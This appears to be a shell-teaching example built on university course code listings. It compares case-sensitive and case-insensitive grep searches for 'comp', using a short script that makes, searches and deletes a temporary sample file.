    comp9321 web applications engineering
    comp9322 service-oriented architectures
    comp9323 e-enterprise project
    comp9331 computer networks&applications
    comp9332 network routing and switching
    comp9333 advanced computer networks
    comp9334 systems capacity planning
    comp9335 wireless mesh&sensor networks
    comp9336 mobile data networking
    comp9337 securing wireless networks
    comp9414 artificial intelligence
    comp9415 computer graphics
    comp9416 knowledge based systems
    comp9417 machine learning & data mining
    comp9418 advanced machine learning
    comp9431 robotic software architecture
    comp9441 security engineering
    comp9444 neural networks
    comp9447 security engineering workshop
    comp9511 human computer interaction
    comp9514 advanced decision theory
    comp9515 pattern classification
    comp9517 computer vision
    comp9518 pattern recognition
    comp9519 multimedia systems
    comp9520 ext foundations of computer sc
    comp9596 research project
    comp9790 principles of gnss positioning
    comp9791 modern navigation &positioning
    comp9801 ext design&analysis of algo
    comp9814 ext artificial intelligence
    comp9833 ext computer networks & appl
    comp9844 ext neural networks
    comp9901 p/t res. thesis comp sci & eng
    comp9902 res. thesis comp sci & eng f/t
    comp9910 mgt&com skills-compsci&eng res
    comp9912 project (24 uoc)
    comp9930 readings in comp sci and eng
    comp9945 research project
    crim3010 comparative criminal justice
    cven1015 computing
    cven1025 computing
    cven2002 engineering computations
    cven2025 engineering computations 1
    cven2702 engineering computations
    cven3025 engineering computations 2
    cven4307 steel & composite structures
    cven8827 composite steel-concrete struc
    cven9820 computational struct mechanics
    cven9822 steel & composite structures
    cven9827 composite steel-concrete struc
    danc2000 dance analysis & composition 1
    danc2005 dance analysis & composition 2
    danc2015 dance analysis & composition 3
    econ3213 comparative forecasting techs
    econ5122 compet. in the know. econ.
    econ5255 computational stats & econ mod
    edst1492 computer skills for teachers
    edst4092 computer skills for teachers
    edst4157 computing studies method 1
    edst4158 computing studies method 2
    elec4343 source coding & compression
    elec4432 computer control & instrumenta
    elec4632 computer control systems
    elec9401 computer control systems 1
    elec9402 computer control systems 2
    elec9403 real time computing & control
    elec9733 real computing and control
    engg1811 computing for engineers
    euro2302 the messiah complex
    fins5553 insur. comp. oper. & manage.
    fndn0301 computing studies
    fndn0302 computing studies and research
    fndn0311 computing studies - t
    food4220 computer applications
    food4320 computer applications
    food4537 computing in food science
    food9101 complex fluid micro & rheology
    gbat9131 leadership in a complex enviro
    gend1212 analysing a picture:comp.&des.
    gend4201 design and computing
    gene8001 computer game design
    genm0515 computers for professionals
    genp0515 computers for professionals
    gens2001 the computer
    gens5525 the comp: its impact, sign'fcnce
    gent0407 tv soaps: a comparative study
    gent0603 the computer: impact, significan
    gent0802 the complexity of everyday life
    gent1003 computers into the 21st c
    geog3161 computer mapping & data displa
    geog3861 computer mapping
    geog9014 computer mapping &data display
    geog9210 computer mapping & data displa
    geol0300 computing & stats for geol
    geol2041 geological computing
    gmat1111 introduction to computing
    gmat1150 survey methods& computations
    gmat1300 comp appl in geomatics
    gmat2111 principles of computer processin
    gmat2112 principles of computer processin
    gmat2122 computer graphics 1
    gmat2131 survey computations
    gmat2350 comp for spatial info sciences
    gmat2500 surveying computations a
    gmat2550 surveying computations b
    gmat3111 survey computations
    gmat3122 computer graphics 1
    gmat3231 geodetic computations
    gmat4111 data analysis & computing 1
    gmat4112 data analysis & computing 1
    gmat5111 data analysis & computing 2
    gmat5112 data analysis & computing 2
    gmat5122 computer graphics 2
    heal9471 comparative h'lth care systems
    heal9501 comp tech for health serv mngt
    hist2487 the messiah complex
    hpsc2610 computers, brains & minds
    hpst2004 computers, brains & minds
    hpst2109 computers, brains & minds
    ides2121 introduction to computing
    ides3101 design studio 5: complexity
    ides3231 adv computer aided product des
    ides5153 computer graphic applications
    ides5154 computer aided design
    iest5009 competencies in sustainability
    iest5010 competencies in sustainability
    ilas0232 computer prog'mng for info. appl
    ilas0233 computing applications in the in
    infs3607 distributed computer systems
    irob5732 spec topic- internat & comp ir
    irob5734 adv seminar-internat & comp ir
    jurd7348 harry gibbs moot comp 6uoc
    jurd7419 competition law and policy
    jurd7473 asian competition law
    jurd7474 competition law and ip
    jurd7489 complex civil litigation
    jurd7522 competition law
    jurd7559 int'l&comparative law w'shop
    jurd7610 mediation competition
    jurd7616 international & comparative ip
    jurd7648 transitional justice intl comp
    jurd7989 comparative anti-terrorism law
    jwst2104 the messiah complex
    land1131 introduction to computer applica
    laws1032 computer applications to law
    laws2065 comparative law
    laws2085 comparative law
    laws2110 comparative constitutional law
    laws2148 harry gibbs moot comp 8uoc
    laws2410 mediation competition
    laws2589 complex civil litigation
    laws3009 comparative criminal justice:
    laws3022 competition law
    laws3035 developing comp apps to law
    laws3051 telecomm. competition & cons.
    laws3148 harry gibbs moot comp
    laws3159 int'l&comparative law w'shop
    laws3348 transitional justice intl comp
    laws3510 mediation competition
    laws3589 complex civil litigation
    laws4016 international & comparative ip
    laws4019 competition law
    laws4089 comparative anti-terrorism law
    laws4120 themes in asian & compar. law
    laws4133 issues in asian & comp law
    laws4291 comparative constitutional law
    laws4620 computer applications to law
    laws4765 complex commercial litigation
    laws5234 competition law and regulation
    laws7003 global issues in comp policy
    laws8016 international & comparative ip
    laws8073 asian competition law
    laws8074 competition law and ip
    laws8118 legal systems in comp persp
    laws8143 comparative patent law
    laws8144 comparative trade mark law
    laws8219 competition law and policy
    laws8289 comparative anti-terrorism law
    laws8348 transitional justice intl comp
    laws8765 complex commercial litigation
    laws9973 comparative law
    laws9984 int. & comp. indigenous law
    legt5531 comp. bus. & legal strategies
    legt5602 tax admin. & compliance
    libs0233 computer applications in the inf
    manf3500 computers in manufacturing 1
    manf4500 computers in manufacturing 2
    manf4601 comp aided production mgmt a
    manf4602 comp aided production mgmt b
    manf8560 computer integrated manufact.
    manf9500 computer-aided progrmg for numcl
    manf9543 comp aided design/manufacture
    manf9560 computer integrated manufact.
    mark3022 computer applications in marketi
    math1061 introductory applied computing
    math2301 mathematical computing
    math2430 symbolic computing
    math2520 complex analysis
    math2521 complex analysis
    math2620 higher complex analysis
    math2621 higher complex analysis
    math2810 statistical computing
    math2910 higher statistical computing
    math3101 computational mathematics
    math3301 advanced math computing
    math3311 math computing for finance
    math3400 logic & computability
    math3421 logic and computability
    math3430 symbolic computing
    math3680 higher complex analysis
    math3790 higher computat. combinatorics
    math3800 statistical computation 1
    math3810 statistical computation 2
    math3821 stat modelling & computing
    math3871 bayesian inference and comp
    math4003 maths and comp sci honours f/t
    math4004 maths and comp sci honours p/t
    math5009 comp'l coursework thesis ft
    math5010 comp'l coursework thesis pt
    math5305 computational mathematics
    math5315 high perf numerical computing
    math5335 comput'l methods for finance
    math5400 logic & computability
    math5505 computational combinatorics
    math5685 complex analysis
    math5856 intro to stats and stat comput
    math5960 bayesian inference & comput'n
    math9315 topics in mathematical computing
    mats1021 computing in materials science
    mats1264 fibre reinforced plastic composi
    mats3064 composite materials
    mats4005 composites and functional mats
    mats5342 comp modelling & design
    mats6110 computational materials
    mbax9131 leadership in a complex enviro
    mech1500 computing 1m
    mech3500 computing 2m
    mech3510 computing applications in mech.
    mech3530 computing applcts in mechanical
    mech3540 computational engineering
    mech4130 computer-aided engineering desig
    mech4150 design & maintenance of componen
    mech4500 computing 3m
    mech4620 computational fluid dynamics
    mech8620 computational fluid dynamics
    mech9150 design & maintenance of componen
    mech9420 composite materials and mechan
    mech9620 computational fluid dynamics
    meft5103 computer media
    mgmt2106 comparative management systems
    mgmt5050 teams, ethics & comp adv
    mgmt5802 comp. adv. through people
    mine0710 computing 1
    mine1720 microcomputers (mining)
    mine1730 computer applications in mining
    mine4082 computational methods
    mine4810 comp methods in geomechanics
    mtrn2500 comp for mtrn
    mtrn3500 comp appl in mechatonic sys
    mtrn3530 computing applcts in mech.sys.
    pfst2000 dance analysis & composition 1
    pfst2005 dance analysis & composition 2
    pfst2011 performance composition
    phar9121 postmarketing compliance meds
    phcm9471 comparative h'lth care systems
    phil5206 ai & computer science
    phil5207 ai & computer science 2a
    phys1601 comp. applic'ns in exp. sci. 1
    phys2001 mechanics & computational phys
    phys2020 computational physics
    phys2120 mechanics and computational
    phys2601 computer applications 2
    phys3601 computer applications in instrum
    phys3610 computational physics
    phys3620 computer based signal processing
    plan1061 computer literacy
    pols2016 concepts in comparative pol cult
    pols3953 comparative politics: russia
    psyc3191 computer science & psychology
    ptrl1013 computing-petroleum engineers
    ptrl4013 well completion & stimulation
    ptrl5016 well completions & stimulation
    ptrl6016 well completions & stimulation
    regs0044 comp law in global context
    regs0115 compliance: financial service
    regs0218 compliance: financial services
    regs0428 computer applications in linguis
    regs0453 multiple regress. & stat comp
    regs0474 comparative international tax
    regs0633 comparative corp & comm law
    regs0638 international comparative corp
    regs0718 energy co-compliance in bldgs
    regs3092 comp cntrl of machines & proc
    regs3265 intl and comparative ind. rel.
    regs3410 computer networks
    regs3873 introduction to computer graphic
    regs3909 trade marks & unfair comp
    regs3948 competition law
    regs4045 competition reg. of mergers
    regs5618 comp integrated manufacturing
    regs7726 composites & multiphase polyme
    regs7908 service managing for comp.adv.
    sart1608 digital composite 1
    sart1681 multimedia computing elective1
    sart1810 introduction to computing
    sart2608 digital composite 2
    sart2681 multimedia computing elective2
    sart2811 multimedia computing workshop
    sart2835 composition and design
    sart3608 digital composite 3
    sart3681 multimedia computing elective3
    sart3840 advanced multimedia computing
    sart9725 intro to multimedia computing
    sart9739 multimedia computing elective
    sart9741 composition and design
    sdes1106 design and computers 1
    sdes1110 design and computers 2
    sdes1111 integrated design computing 1
    sdes1211 integrated design computing 2
    sdes1601 colour,composition &typography
    sdes2107 design and computers 3
    sdes2115 design and computers 2b
    sdes3107 design and computers 4
    sdes3173 advanced computer graphics
    sdes4103 design and computers 4
    sdes6714 intro 3d computer aided design
    slsp2902 computers and comm.
    soca3314 the messiah complex
    soci3401 computer analysis of social data
    soci3408 computer analysis of social data
    soma1608 digital composite
    soma1681 intro multimedia computing
    soma1810 introduction to computing
    soma2402 tangible computing
    soma2608 digital composite 2
    soma2681 advanced multimedia computing
    soma2811 multimedia computing workshop
    soma3415 compositional project
    soma3608 digital composite 3
    surv1111 introduction to computing
    surv2111 principles of computer processin
    surv2122 computer graphics 1
    surv3111 survey computations
    surv3231 geodetic computations
    surv4111 data analysis & computing 1
    surv5111 data analysis & computing 2
    surv5122 computer graphics 2
    surv6121 computer graphics
    tabl1002 computer information systems
    tabl2053 acct for complex struct & inst
    tabl3044 comparative tax systems
    tabl5544 comparative tax systems
    tedg1101 computers in education
    tedg1106 computer-based resources: design
    tedg1107 managing with computers in schoo
    tedg1112 computers - gifted & talented st
    tedg1113 computer control technology in e
    teed1134 fundamentals of computing
    teed2119 computers & people
    tele4343 source coding and compression
    tele9302 computer networks
    text2501 computing applications
    zacm3011 component design
    zacm3433 compressible flow
    zacm4020 computational structures
    zacm4031 compressible flow
    zacm4913 eng app of comp fluid dynamics
    zbus2200 markets and competition
    zeit1101 computational problem solving
    zeit1110 computer games
    zeit2102 computer technology
    zeit2305 computer games
    zeit3113 computer languages & algorithm
    zeit3304 computing proj - info sys
    zeit3307 computer games
    zeit4003 computational fluid dynamics
    zeit7101 computational problem solving
    zeit8020 computer network operations
    zeit8028 computer forensics
    zeit9100 computer science research f/t
    zeit9101 computer science research p/t
    zgen2300 computers in society
    zgen2301 computer games
    zhss8431 comparative defence planning
    zint1001 eng comp methods 1
    zite1001 computer tools for engineers
    zite1101 intro to computer science
    zite2101 computer languages & algorithm
    zite2102 computer technology
    zite3101 computing proj - comp sci
    zite3105 human computer interaction
    zite3106 interactive computer graphics
    zite3113 computer languages & algorithm
    zite3211 microcomputer interfacing
    zite3304 computing proj - info sys
    zite4101 computer sci 4 (comb hons) f/t
    zite4102 computer sci 4 (comb hon) p/t
    zite4103 computer science 4 (hons) f/t
    zite4104 computer science 4 (hons) p/t
    zite8103 computer graphics
    zite8104 computer security
    zite8105 computer speech processing
    zite8145 softcomp
    zite9100 computer science research f/t
    zite9101 computer science research p/t
    zpem3302 complex variables
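
The listing above is entirely lower case, whereas the output of egrep -i comp course_codes below keeps each line's original capitalisation. The following is a minimal sketch of that difference, not part of the original examples. It assumes a small temporary sample file rather than the real course_codes; two of its lines are copied from the listings here and the third (XXXX0000) is a hypothetical non-matching entry. It uses grep -E, the equivalent of egrep.

```shell
#!/bin/sh
# Build a small sample file (an assumption: it stands in for course_codes).
sample=$(mktemp)
printf '%s\n' \
    'COMP2041 Software Construction' \
    'MATH2520 Complex Analysis' \
    'XXXX0000 Unrelated Course' > "$sample"   # XXXX0000 is hypothetical

# Case-sensitive search: no line contains lower-case "comp", so nothing matches.
# "|| true" keeps the script going even though grep exits non-zero on no match.
case_sensitive=$(grep -E comp "$sample" || true)

# -i ignores case when matching and prints the matching lines unchanged.
ignore_case=$(grep -E -i comp "$sample")

# Lower-casing first finds the same lines but alters the text that is printed.
lowered=$(tr A-Z a-z < "$sample" | grep -E comp)

printf 'case-sensitive match:\n%s\n\n' "$case_sensitive"
printf 'grep -E -i:\n%s\n\n' "$ignore_case"
printf 'tr then grep -E:\n%s\n' "$lowered"

rm -f "$sample"
```

Both approaches select the same lines; -i is the better choice when the original capitalisation of the output matters.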
    
    egrep -i comp course_codes
    ACIV2518 Eng Computational Methods 1
    ACSC1600 Computer Science 1
    ACSC1800 Computer Science 1E
    ACSC2015 Interactive Computer Graphics
    ACSC2020 Computer Science Core B2
    ACSC2021 Computer Systems Architectrue 2
    ACSC2107 Computer Languages B
    ACSC2601 Computer Science 2A
    ACSC2602 Computer Science 2B
    ACSC2802 Computer Science 2EE
    ACSC3003 Computer Project
    ACSC3029 Computing Project 3
    ACSC3030 Cryptography & Computer Securi
    ACSC3601 Computer Science 3A
    ACSC3603 Computer Science 3C
    ACSC4191 Computer Science 4 (Hons) F/T
    ACSC7304 Computer Graphics
    ACSC7306 Computer Speech Processing
    ACSC7336 Computer Security
    ACSC8248 Computer Graphics (12 Cpt)
    ACSC9000 Computer Science Research F/T
    ACSC9001 Computer Science Research P/T
    AELE2007 Computer Design
    AELE2508 Microcomputer Interfacing
    AELE3031 Microcomputer Interfacing
    AELE4511 Computer Control Theory
    AMAT3107 Complex Variables
    AMAT3401 Complex Analysis 3E
    AMAT3503 Complex Variables E
    AMEC3512 Pumps, Turbines & Compressors
    ANCE8001 Computational Mathematics
    ANCE8002 Supercomputing Techniques
    ANCE9105 Comp Techniques Fluid Dynamics
    APHY3028 Computational Physics
    ARCH1391 Digital Computation Studio
    ARCH5202 Computer Applications 2
    ARCH5203 Computer Applications 3
    ARCH5205 Theory of Architectural Computin
    ARCH5220 Computer Graphics Programming 1
    ARCH5221 Computer Graphics Programming 2
    ARCH5223 Computer Applications 2
    ARCH5940 Theory of Architectural Computin
    ARCH5942 Arctitectural Computing Seminar
    ARCH5943 Theory of Architectural Computin
    ARCH6201 Architectural Computing 1
    ARCH6205 Architectural Computing 2
    ARCH6214 Architectural Computing 2
    ARCH7204 Design Computing Theory
    ARCH7205 Computer Graphics Programming
    ARTS2301 Computers, Brains & Minds
    ATAX0002 Computer Information Systems
    ATAX0053 Acct for Complex Struct & Inst
    ATAX0324 GST: Complex Issues & Planning
    ATAX0341 Comparative Tax Systems
    ATAX0424 GST: Complex Issues & Planning
    ATAX0441 Comparative Tax Systems
    ATAX0524 GST: Complex Issues & Planning
    ATAX0641 Comparative Tax Systems
    AUST2003 Aborig. Studies: a Global Compar
    AVEN1500 Computing for Aviation
    BEIL0003 BE Annual Design Competition
    BEIL0004 Design Competitions and Bids
    BENV1141 Computers and Information Tech
    BENV1242 Computer-Aided Design
    BENV2405 Computer Graphics Programming
    BINF3020 Computational Bioinformatics
    BINF9020 Computational Bioinformatics
    BIOM5912 Comp Thesis B&C
    BIOM5920 Thesis Part A (Comp)
    BIOM5921 Thesis Part B (Comp)
    BIOM9332 Biocompatibility
    BIOM9501 Computing for Biomedical Eng
    BIOM9601 Biomed Applic.of Microcomp 1
    BIOM9602 Biomed Applic.of Microcomp 2
    BIOS3021 Comparative Animal Physiology
    BLDG2281 Introduction To Computing
    BLDG3282 Computer Apps in Building
    BLDG3482 Computer Aplications in Constr
    CEIC5310 Computing Studies in The Process
    CEIC8310 Computing Studies Proc Ind
    CEIC8335 Adv Computer Methods
    CHEM3031 Inorg Chem:Trans Metals & Comp
    CHEM3640 Computers in Chemistry
    CIVL1015 Computing
    CIVL1106 Computing & Graphics
    CIVL3015 Engineering Computations
    CIVL3106 Engineering Computations
    CMED9517 Adv Biostatistic & Stat Comp
    CODE1110 Computational Design Theory 1
    CODE1210 Computational Design Theory 2
    CODE2110 Computational Design Theory 3
    CODE2120 Computational Sustainability
    CODE2121 Advanced Computational Design
    COFA2682 Multi-media Computing Unit 3
    COFA3681 Multi-media Computing Elective 1
    COFA5116 Design & Computers
    COFA5130 Typography & Composition
    COFA5216 Design & Computers 1
    COFA5240 Design & Computers 2 Cad
    COFA5241 Design & Computers 2 Graphics
    COFA5338 Design & Computers 3 - Cad
    COFA5339 Design & Computers 3 - Graphic
    COFA8670 Intro To Multi-media Computing
    COMD2040 Of Tigers & Pussycats: a Compa
    COMP0011 Fundamentals of Computing
    COMP1000 Web, Spreadsheets & Databases
    COMP1001 Introduction to Computing
    COMP1011 Computing 1A
    COMP1021 Computing 1B
    COMP1081 Harnessing the Power of IT
    COMP1091 Solving Problems with Software
    COMP1400 Programming for Designers
    COMP1711 Higher Computing 1A
    COMP1721 Higher Computing 1B
    COMP1911 Computing 1A
    COMP1917 Computing 1
    COMP1921 Computing 1B
    COMP1927 Computing 2
    COMP2011 Data Organisation
    COMP2021 Digital System Structures
    COMP2041 Software Construction
    COMP2091 Computing 2
    COMP2110 Software System Specification
    COMP2111 System Modelling and Design
    COMP2121 Microprocessors & Interfacing
    COMP2411 Logic and Logic Programming
    COMP2711 Higher Data Organisation
    COMP2811 Computing B
    COMP2911 Eng. Design in Computing
    COMP2920 Professional Issues and Ethics
    COMP3111 Software Engineering
    COMP3120 Introduction to Algorithms
    COMP3121 Algorithms & Programming Tech
    COMP3131 Programming Languages & Compil
    COMP3141 Software Sys Des&Implementat'n
    COMP3151 Foundations of Concurrency
    COMP3152 Comparative Concurrency Semant
    COMP3153 Algorithmic Verification
    COMP3161 Concepts of Programming Lang.
    COMP3171 Object-Oriented Programming
    COMP3211 Computer Architecture
    COMP3221 Microprocessors & Embedded Sys
    COMP3222 Digital Circuits and Systems
    COMP3231 Operating Systems
    COMP3241 Real Time Systems
    COMP3311 Database Systems
    COMP3331 Computer Networks&Applications
    COMP3411 Artificial Intelligence
    COMP3421 Computer Graphics
    COMP3431 Robotic Software Architecture
    COMP3441 Security Engineering
    COMP3511 Human Computer Interaction
    COMP3601 Design Project A
    COMP3710 Software Project Management
    COMP3711 Software Project Management
    COMP3720 Total Quality Management
    COMP3821 Ext Algorithms&Prog Techniques
    COMP3881 Ext Digital Circuits & Systems
    COMP3891 Ext Operating Systems
    COMP3901 Special Project A
    COMP3902 Special Project B
    COMP3931 Ext Computer Networks & App
    COMP4001 Object-Oriented Software Dev
    COMP4002 Logic Synthesis & Verification
    COMP4003 Industrial Software Developmen
    COMP4011 Web Applications Engineering
    COMP4012 Occasional Elec S2 - Comp.Eng.
    COMP4121 Advanced & Parallel Algorithms
    COMP4128 Programming Challenges
    COMP4131 Programming Language Semantics
    COMP4132 Adv. Functional Programming
    COMP4133 Advanced Compiler Construction
    COMP4141 Theory of Computation
    COMP4151 Algorithmic Verification
    COMP4161 Advanced Verification
    COMP4181 Language-based Software Safety
    COMP4211 Adv Architectures & Algorithms
    COMP4314 Next Generation Database Systs
    COMP4317 XML and Databases
    COMP4335 Wireless Mesh&Sensor Networks
    COMP4336 Mobile Data Networking
    COMP4337 Securing Wireless Networks
    COMP4411 Experimental Robotics
    COMP4412 Introduction to Modal Logic
    COMP4415 First-order Logic
    COMP4416 Intelligent Agents
    COMP4418 Knowledge Representation
    COMP4431 Game Design Workshop
    COMP4432 Game Design Studio
    COMP4442 Advanced Computer Security
    COMP4511 User Interface Design & Constr
    COMP4601 Design Project B
    COMP4903 Industrial Training
    COMP4904 Industrial Training 1
    COMP4905 Industrial Training 2
    COMP4906 Industrial Training 3
    COMP4910 Thesis Part A
    COMP4911 Thesis Part B
    COMP4913 Computer Science 4 Honours P/T
    COMP4914 Computer Science 4 Honours F/T
    COMP4920 Management and Ethics
    COMP4930 Thesis Part A
    COMP4931 Thesis Part B
    COMP4941 Thesis Part B
    COMP6714 Info Retrieval and Web Search
    COMP6721 (In-)Formal Methods
    COMP6731 Combinatorial Data Processing
    COMP6733 Internet of Things
    COMP6741 Parameterized & Exact Comp.
    COMP6752 Modelling Concurrent Systems
    COMP6771 Advanced C++ Programming
    COMP9000 Special Program
    COMP9001 E-Commerce Technologies
    COMP9008 Software Engineering
    COMP9009 Adv Topics in Software Eng
    COMP9015 Issues in Computing
    COMP9018 Advanced Graphics
    COMP9020 Foundations of Comp. Science
    COMP9021 Principles of Programming
    COMP9022 Digital Systems Structures
    COMP9024 Data Structures & Algorithms
    COMP9031 Internet Programming
    COMP9032 Microprocessors & Interfacing
    COMP9041 Software Construction
    COMP9081 Harnessing the Power of IT
    COMP9101 Design &Analysis of Algorithms
    COMP9102 Programming Lang & Compilers
    COMP9103 Algorithms & Comp. Complexity
    COMP9104 Quantum ICT
    COMP9116 S'ware Dev: B-Meth & B-Toolkit
    COMP9117 Software Architecture
    COMP9151 Foundations of Concurrency
    COMP9152 Comparative Concurrency Semant
    COMP9153 Algorithmic Verification
    COMP9161 Concepts of Programming Lang.
    COMP9171 Object-Oriented Programming
    COMP9181 Language-based Software Safety
    COMP9201 Operating Systems
    COMP9211 Computer Architecture
    COMP9221 Microprocessors & Embedded Sys
    COMP9222 Digital Circuits and Systems
    COMP9231 Integrated Digital Systems
    COMP9242 Advanced Operating Systems
    COMP9243 Distributed Systems
    COMP9244 Software View of Proc Architec
    COMP9245 Real-Time Systems
    COMP9282 Ext Micros & Interfacing
    COMP9283 Ext Operating Systems
    COMP9311 Database Systems
    COMP9313 Big Data Management
    COMP9314 Next Generation Database Systs
    COMP9315 Database Systems Implementat'n
    COMP9316 eCommerce Implementation
    COMP9317 XML and Databases
    COMP9318 Data Warehousing & Data Mining
    COMP9319 Web Data Compression & Search
    COMP9321 Web Applications Engineering
    COMP9322 Service-Oriented Architectures
    COMP9323 e-Enterprise Project
    COMP9331 Computer Networks&Applications
    COMP9332 Network Routing and Switching
    COMP9333 Advanced Computer Networks
    COMP9334 Systems Capacity Planning
    COMP9335 Wireless Mesh&Sensor Networks
    COMP9336 Mobile Data Networking
    COMP9337 Securing Wireless Networks
    COMP9414 Artificial Intelligence
    COMP9415 Computer Graphics
    COMP9416 Knowledge Based Systems
    COMP9417 Machine Learning & Data Mining
    COMP9418 Advanced Machine Learning
    COMP9431 Robotic Software Architecture
    COMP9441 Security Engineering
    COMP9444 Neural Networks
    COMP9447 Security Engineering Workshop
    COMP9511 Human Computer Interaction
    COMP9514 Advanced Decision Theory
    COMP9515 Pattern Classification
    COMP9517 Computer Vision
    COMP9518 Pattern Recognition
    COMP9519 Multimedia Systems
    COMP9520 Ext Foundations of Computer Sc
    COMP9596 Research Project
    COMP9790 Principles of GNSS Positioning
    COMP9791 Modern Navigation &Positioning
    COMP9801 Ext Design&Analysis of Algo
    COMP9814 Ext Artificial Intelligence
    COMP9833 Ext Computer Networks & Appl
    COMP9844 Ext Neural Networks
    COMP9901 P/T Res. Thesis Comp Sci & Eng
    COMP9902 Res. Thesis Comp Sci & Eng F/T
    COMP9910 Mgt&Com Skills-CompSci&Eng Res
    COMP9912 Project (24 UOC)
    COMP9930 Readings in Comp Sci and Eng
    COMP9945 Research Project
    CRIM3010 Comparative Criminal Justice
    CVEN1015 Computing
    CVEN1025 Computing
    CVEN2002 Engineering Computations
    CVEN2025 Engineering Computations 1
    CVEN2702 Engineering Computations
    CVEN3025 Engineering Computations 2
    CVEN4307 Steel & Composite Structures
    CVEN8827 Composite Steel-Concrete Struc
    CVEN9820 Computational Struct Mechanics
    CVEN9822 Steel & Composite Structures
    CVEN9827 Composite Steel-Concrete Struc
    DANC2000 Dance Analysis & Composition 1
    DANC2005 Dance Analysis & Composition 2
    DANC2015 Dance Analysis & Composition 3
    ECON3213 Comparative Forecasting Techs
    ECON5122 Compet. in the Know. Econ.
    ECON5255 Computational Stats & Econ Mod
    EDST1492 Computer Skills for Teachers
    EDST4092 Computer Skills for Teachers
    EDST4157 Computing Studies Method 1
    EDST4158 Computing Studies Method 2
    ELEC4343 Source Coding & Compression
    ELEC4432 Computer Control & Instrumenta
    ELEC4632 Computer Control Systems
    ELEC9401 Computer Control Systems 1
    ELEC9402 Computer Control Systems 2
    ELEC9403 Real Time Computing & Control
    ELEC9733 Real Computing and Control
    ENGG1811 Computing for Engineers
    EURO2302 The Messiah Complex
    FINS5553 Insur. Comp. Oper. & Manage.
    FNDN0301 Computing Studies
    FNDN0302 Computing Studies and Research
    FNDN0311 Computing Studies - T
    FOOD4220 Computer Applications
    FOOD4320 Computer Applications
    FOOD4537 Computing in Food Science
    FOOD9101 Complex Fluid Micro & Rheology
    GBAT9131 Leadership in a Complex Enviro
    GEND1212 Analysing a Picture:Comp.&Des.
    GEND4201 Design and Computing
    GENE8001 Computer Game Design
    GENM0515 Computers for Professionals
    GENP0515 Computers for Professionals
    GENS2001 The Computer
    GENS5525 The Comp: Its Impact, Sign'fcnce
    GENT0407 Tv Soaps: a Comparative Study
    GENT0603 The Computer: Impact, Significan
    GENT0802 The Complexity of Everyday Life
    GENT1003 Computers into the 21st C
    GEOG3161 Computer Mapping & Data Displa
    GEOG3861 Computer Mapping
    GEOG9014 Computer Mapping &Data Display
    GEOG9210 Computer Mapping & Data Displa
    GEOL0300 Computing & Stats for Geol
    GEOL2041 Geological Computing
    GMAT1111 Introduction To Computing
    GMAT1150 Survey Methods& Computations
    GMAT1300 Comp Appl in Geomatics
    GMAT2111 Principles of Computer Processin
    GMAT2112 Principles of Computer Processin
    GMAT2122 Computer Graphics 1
    GMAT2131 Survey Computations
    GMAT2350 Comp for Spatial Info Sciences
    GMAT2500 Surveying Computations A
    GMAT2550 Surveying Computations B
    GMAT3111 Survey Computations
    GMAT3122 Computer Graphics 1
    GMAT3231 Geodetic Computations
    GMAT4111 Data Analysis & Computing 1
    GMAT4112 Data Analysis & Computing 1
    GMAT5111 Data Analysis & Computing 2
    GMAT5112 Data Analysis & Computing 2
    GMAT5122 Computer Graphics 2
    HEAL9471 Comparative H'lth Care Systems
    HEAL9501 Comp Tech for Health Serv Mngt
    HIST2487 The Messiah Complex
    HPSC2610 Computers, Brains & Minds
    HPST2004 Computers, Brains & Minds
    HPST2109 Computers, Brains & Minds
    IDES2121 Introduction To Computing
    IDES3101 Design Studio 5: Complexity
    IDES3231 Adv Computer Aided Product Des
    IDES5153 Computer Graphic Applications
    IDES5154 Computer Aided Design
    IEST5009 Competencies in Sustainability
    IEST5010 Competencies in Sustainability
    ILAS0232 Computer Prog'mng for Info. Appl
    ILAS0233 Computing Applications in The in
    INFS3607 Distributed Computer Systems
    IROB5732 Spec Topic- Internat & Comp IR
    IROB5734 Adv Seminar-Internat & Comp IR
    JURD7348 Harry Gibbs Moot Comp 6uoc
    JURD7419 Competition Law and Policy
    JURD7473 Asian Competition Law
    JURD7474 Competition Law and IP
    JURD7489 Complex Civil Litigation
    JURD7522 Competition Law
    JURD7559 Int'l&Comparative Law W'shop
    JURD7610 Mediation Competition
    JURD7616 International & Comparative IP
    JURD7648 Transitional Justice Intl Comp
    JURD7989 Comparative Anti-Terrorism Law
    JWST2104 The Messiah Complex
    LAND1131 Introduction To Computer Applica
    LAWS1032 Computer Applications to Law
    LAWS2065 Comparative Law
    LAWS2085 Comparative Law
    LAWS2110 Comparative Constitutional Law
    LAWS2148 Harry Gibbs Moot Comp 8uoc
    LAWS2410 Mediation Competition
    LAWS2589 Complex Civil Litigation
    LAWS3009 Comparative Criminal Justice:
    LAWS3022 Competition Law
    LAWS3035 Developing Comp Apps to Law
    LAWS3051 Telecomm. Competition & Cons.
    LAWS3148 Harry Gibbs Moot Comp
    LAWS3159 Int'l&Comparative Law W'shop
    LAWS3348 Transitional Justice Intl Comp
    LAWS3510 Mediation Competition
    LAWS3589 Complex Civil Litigation
    LAWS4016 International & Comparative IP
    LAWS4019 Competition Law
    LAWS4089 Comparative Anti-Terrorism Law
    LAWS4120 Themes in Asian & Compar. Law
    LAWS4133 Issues in Asian & Comp Law
    LAWS4291 Comparative Constitutional Law
    LAWS4620 Computer Applications To Law
    LAWS4765 Complex Commercial Litigation
    LAWS5234 Competition Law and Regulation
    LAWS7003 Global Issues in Comp Policy
    LAWS8016 International & Comparative IP
    LAWS8073 Asian Competition Law
    LAWS8074 Competition Law and IP
    LAWS8118 Legal Systems in Comp Persp
    LAWS8143 Comparative Patent Law
    LAWS8144 Comparative Trade Mark Law
    LAWS8219 Competition Law and Policy
    LAWS8289 Comparative Anti-Terrorism Law
    LAWS8348 Transitional Justice Intl Comp
    LAWS8765 Complex Commercial Litigation
    LAWS9973 Comparative Law
    LAWS9984 Int. & Comp. Indigenous Law
    LEGT5531 Comp. Bus. & Legal Strategies
    LEGT5602 Tax Admin. & Compliance
    LIBS0233 Computer Applications in The Inf
    MANF3500 Computers in Manufacturing 1
    MANF4500 Computers in Manufacturing 2
    MANF4601 Comp Aided Production Mgmt A
    MANF4602 Comp Aided Production Mgmt B
    MANF8560 Computer Integrated Manufact.
    MANF9500 Computer-aided Progrmg for Numcl
    MANF9543 Comp Aided Design/Manufacture
    MANF9560 Computer Integrated Manufact.
    MARK3022 Computer Applications in Marketi
    MATH1061 Introductory Applied Computing
    MATH2301 Mathematical Computing
    MATH2430 Symbolic Computing
    MATH2520 Complex Analysis
    MATH2521 Complex Analysis
    MATH2620 Higher Complex Analysis
    MATH2621 Higher Complex Analysis
    MATH2810 Statistical Computing
